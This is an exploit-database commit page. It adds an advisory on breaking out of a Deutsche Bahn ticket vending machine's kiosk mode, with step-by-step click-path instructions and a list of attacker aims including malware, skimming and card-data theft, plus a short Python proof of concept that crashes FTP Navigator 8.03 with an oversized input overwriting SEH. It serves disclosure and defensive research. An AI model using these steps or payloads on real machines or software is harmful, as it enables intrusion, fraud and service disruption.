DB: 2019-12-20
2 changes to exploits/shellcodes FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH) Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation
This commit is contained in:
parent
b7471ba451
commit
012657c6b9
3 changed files with 294 additions and 0 deletions
266
exploits/hardware/webapps/47796.txt
Normal file
266
exploits/hardware/webapps/47796.txt
Normal file
|
@ -0,0 +1,266 @@
|
|||
# Exploit Title: Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation
|
||||
# Date: 2019-12-18
|
||||
# Exploit Author: Vulnerability-Lab
|
||||
# Vendor Homepage: https://www.bahn.de/db_vertrieb/view/leistungen/automaten-fahrkartenentwerter.shtml
|
||||
# Tested on: Windows XP
|
||||
|
||||
Document Title:
|
||||
===============
|
||||
Deutsche Bahn Ticket Vending Machine - Local Kiosk Privilege Escalation Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2191
|
||||
|
||||
Vulnerability Magazine:
|
||||
https://www.vulnerability-db.com/?q=articles/2019/12/13/zero-day-vulnerability-deutsche-bahn-ticket-machine-series-system-uncovered
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2019-12-14
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2191
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
6.4
|
||||
|
||||
|
||||
Vulnerability Class:
|
||||
====================
|
||||
Privilege Escalation
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Customers can buy tickets at our ticket machines at any time, regardless
|
||||
of opening hours. Thus, the vending machine also
|
||||
secures sales in rural areas.
|
||||
|
||||
- innovatively designed user guidance
|
||||
- Real-time timetable information for rail traffic
|
||||
- traveler information
|
||||
- ticket paper supply
|
||||
- free fault hotline: 0800 2886644
|
||||
- Professional and contemporary maintenance
|
||||
|
||||
The ticket vending machine can also be configured according to
|
||||
individual requirements. The housing can be designed as desired.
|
||||
Customers can purchase their tickets with different means of payment.
|
||||
User guidance is available in different languages.
|
||||
|
||||
(Copy of the Homepage:
|
||||
https://www.bahn.de/db_vertrieb/view/leistungen/automaten-fahrkartenentwerter.shtml
|
||||
)
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a local kiosk
|
||||
privilege escalation vulnerability in the deutsche bahn ticket vending
|
||||
machine series with windows xp.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2019-12-14: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Local
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Authentication Type:
|
||||
====================
|
||||
No authentication (guest)
|
||||
|
||||
|
||||
User Interaction:
|
||||
=================
|
||||
No User Interaction
|
||||
|
||||
|
||||
Disclosure Type:
|
||||
================
|
||||
Responsible Disclosure Program
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A kiosk mode escalation vulnerability has been discovered in the
|
||||
official deutsche bahn ticket vending machine series for windows.
|
||||
The security vulnerability allows local attackers to bypass the kiosk
|
||||
mode to compromise the local file system and applications.
|
||||
|
||||
It is possible for local attackers to break out of the kiosk mode of the
|
||||
Deutsche Bahn vending machine application if
|
||||
the Password Agent (PasswordAgent.exe) of the system receives a timeout
|
||||
or has a runtime error in the program
|
||||
itself in the background. These errors can occur due to aborted
|
||||
sessions, unclean logout or common errors when
|
||||
using the application at system level.
|
||||
|
||||
In the event of a local error, attackers can bring the error message to
|
||||
the foreground by pressing the number field - Cancel
|
||||
during a transaction. After the error message becomes visible, the
|
||||
attacker can click on a link of the error message where you
|
||||
can normally see what the error report contains. The attacker will then
|
||||
be redirected to a form in the error message, where he
|
||||
can search for errors in a collection of microsoft articles via "Submit
|
||||
/ Dont' Submit" or another link on the online path. There
|
||||
the attacker clicks on it and receives the web browser. From the web
|
||||
browser, the attacker retrieves the options menu and can access
|
||||
the local system directory and has then the ability to compromise the
|
||||
ticket vending machine with windows xp.
|
||||
|
||||
The error message is normally on those devices deactivated through a
|
||||
hardening process of the servce provider. In that special case
|
||||
the exception handling of windows was not deactivated or set to the
|
||||
background, which allows the attacker to move through to other
|
||||
options to finally access the file system via browser.
|
||||
|
||||
The ticket vending machine vulnerability requires no user interaction
|
||||
and can only be exploited by local attackers with physical
|
||||
device access. No keyboard or front loader opening required.
|
||||
|
||||
|
||||
Vulnerable System(s):
|
||||
[+] Windows XP
|
||||
|
||||
Affected Component(s):
|
||||
[+] Exception Handling (Error Message Content)
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The local vulnerability can be exploited by local attackers with
|
||||
physical device access without user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the
|
||||
provided information and steps below to continue.
|
||||
|
||||
|
||||
PoC: Sheet
|
||||
PasswordAgent.exe := Unexpected Error (Background) - Runtime/Session/Timeout
|
||||
=> Transaction Application => Cancel := Unexpected Error (Background) -
|
||||
Runtime/Session/Timeout (Front)
|
||||
=> Click Error Report => Click Search Collection => Web Browser => Local
|
||||
File System => PWND!
|
||||
|
||||
|
||||
What are attackers able to do when the file system of the vending
|
||||
machine is accessable thus way?
|
||||
1. Inject of local malware to the ticket machine (editor / debugger /
|
||||
cmd / ps - exp. ransomware/malware)
|
||||
2. Local manipulation for skimming devices to assist (transmit prepares)
|
||||
2. Phishing of local credentials from screen via system (db browser
|
||||
application)
|
||||
3. Intercept or manipulation to access card information (local file
|
||||
system - sniff/extract)
|
||||
4. Crash or freeze the computer system (exp. kill of process / loop script)
|
||||
5. Scare or joké activities (exp. html / js to front screens with web
|
||||
browser or by a new window process)
|
||||
|
||||
Refernece(s):
|
||||
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6457.JPG
|
||||
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6458.JPG
|
||||
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6460.JPG
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
There are now several problems related to system hardening that can be
|
||||
resolved:
|
||||
1. It should not be possible for users with system user rights to use
|
||||
the web browsers
|
||||
2. The error message menu can be deactivated or completely modified
|
||||
3. Some functions in menus can be deactivated by hardening (browser,
|
||||
messages & Co.)
|
||||
4. Check that all other tasks are always running in the background or
|
||||
are being moved there permanently
|
||||
5. The deutsche bahn vending machine application and user interface
|
||||
should be shut down in the event of persistent errors in the foreground
|
||||
6. The activities of the testing has been logged but did not triggered
|
||||
any alert for defense purpose
|
||||
|
||||
|
||||
Deutsche Bahn: Patch Rollout in Progress
|
||||
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/073915298_0.png
|
||||
|
||||
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/dbatm78235.png
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the local ticket vending machine system
|
||||
vulnerability is estimated as high. The bug to escalate can be easily
|
||||
exploited by local interaction with the touch display to access the file
|
||||
system.
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Benjamin K.M. -
|
||||
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without
|
||||
any warranty. Vulnerability Lab disclaims all warranties,
|
||||
either expressed or implied, including the warranties of merchantability
|
||||
and capability for a particular purpose. Vulnerability-Lab
|
||||
or its suppliers are not liable in any case of damage, including direct,
|
||||
indirect, incidental, consequential loss of business profits
|
||||
or special damages, even if Vulnerability-Lab or its suppliers have been
|
||||
advised of the possibility of such damages. Some states do
|
||||
not allow the exclusion or limitation of liability for consequential or
|
||||
incidental damages so the foregoing limitation may not apply.
|
||||
We do not approve or encourage anybody to break any licenses, policies,
|
||||
deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com www.vuln-lab.com
|
||||
www.vulnerability-db.com
|
||||
Services: magazine.vulnerability-lab.com
|
||||
paste.vulnerability-db.com infosec.vulnerability-db.com
|
||||
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
|
||||
youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php
|
||||
vulnerability-lab.com/rss/rss_upcoming.php
|
||||
vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php
|
||||
vulnerability-lab.com/register.php
|
||||
vulnerability-lab.com/list-of-bug-bounty-programs.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this
|
||||
file requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified
|
||||
form is granted. All other rights, including the use of other
|
||||
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
|
||||
All pictures, texts, advisories, source code, videos and other
|
||||
information on this website is trademark of vulnerability-lab team & the
|
||||
specific authors or managers. To record, list, modify, use or
|
||||
edit our material contact (admin@ or research@) to get a ask permission.
|
||||
|
||||
Copyright © 2019 | Vulnerability Laboratory - [Evolution
|
||||
Security GmbH]™
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
26
exploits/windows/dos/47794.py
Executable file
26
exploits/windows/dos/47794.py
Executable file
|
@ -0,0 +1,26 @@
|
|||
# Exploit Title: FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)
|
||||
# Date: 2019-12-18
|
||||
# Exploit Author: Chris Inzinga
|
||||
# Vendor Homepage: http://www.internet-soft.com/
|
||||
# Software Link: https://www.softpedia.com/dyn-postdownload.php/5edd515b8045f156a9dd48599c2539e5/5dfa4560/d0c/0/1
|
||||
# Version: 8.03
|
||||
# Tested on: Windows 7 SP1 (x86)
|
||||
|
||||
# Steps to reproduce:
|
||||
# 1. Generate a malicious payload via the POC
|
||||
# 2. In the application click "FTP - Server" > "Custom Command"
|
||||
# 3. Paste the contents of the PoC file into the input box below SERVER LIST and press "Do it!"
|
||||
# 4. Observe a program DOS crash, overwriting SEH
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
payload = "A" * 4108 + "B" * 4 + "C" * 40
|
||||
|
||||
try:
|
||||
fileCreate =open("exploit.txt","w")
|
||||
print("[x] Creating file")
|
||||
fileCreate.write(payload)
|
||||
fileCreate.close()
|
||||
print("[x] File created")
|
||||
except:
|
||||
print("[!] File failed to be created")
|
|
@ -6624,6 +6624,7 @@ id,file,description,date,author,type,platform,port
|
|||
47771,exploits/windows/dos/47771.c,"Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC)",2019-12-12,"Nassim Asrir",dos,windows,
|
||||
47786,exploits/windows/dos/47786.py,"XnView 2.49.1 - 'Research' Denial of Service (PoC)",2019-12-18,ZwX,dos,windows,
|
||||
47791,exploits/macos/dos/47791.txt,"macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event()",2019-12-18,"Google Security Research",dos,macos,
|
||||
47794,exploits/windows/dos/47794.py,"FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)",2019-12-19,"Chris Inzinga",dos,windows,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -42101,3 +42102,4 @@ id,file,description,date,author,type,platform,port
|
|||
47787,exploits/hardware/webapps/47787.txt,"Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin)",2019-12-18,"Ismail Tasdelen",webapps,hardware,
|
||||
47789,exploits/asp/webapps/47789.txt,"Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting",2019-12-18,"Harshit Shukla",webapps,asp,
|
||||
47793,exploits/aspx/webapps/47793.txt,"Telerik UI - Remote Code Execution via Insecure Deserialization",2019-12-18,"Bishop Fox",webapps,aspx,
|
||||
47796,exploits/hardware/webapps/47796.txt,"Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation",2019-12-19,Vulnerability-Lab,webapps,hardware,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue